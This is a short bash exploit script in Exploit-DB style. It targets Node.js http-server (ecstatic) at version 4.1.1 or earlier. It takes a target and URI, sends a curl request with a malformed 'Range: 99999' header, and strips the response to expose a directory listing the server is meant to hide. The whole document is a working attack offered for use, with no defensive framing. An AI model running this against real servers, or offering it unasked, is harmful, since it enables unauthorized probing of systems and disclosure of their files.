#!/bin/bash

# Exploit Title: Node.JS <= 4.1.1 http-server (ecstatic) 'Range:' - Directory Listing
# Date: 2025-09-12
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://github.com/http-party
# Software Link: https://github.com/http-party/http-server
# Version: <= 4.1.1
# Tested on: Linux
# Category: Web Application
# CVE: N/A

while getopts ":t:u:" arg; do
  case $arg in
    t) TARGET=$OPTARG; let parameter_counter+=1 ;;
    u) URI=$OPTARG; let parameter_counter+=1 ;;
  esac
done

if [ -z "$TARGET" ] || [ -z "$URI" ]; then
  echo -e "\n[i] Usage: ${0} -t <TARGET> -u <URI>\n"
  exit
else
  echo -e "\n[+] TARGET: ${TARGET}${URI}\n"
  curl -s -H "Range: 99999" ${TARGET}${URI} | html2text | sed '1d;$d'
fi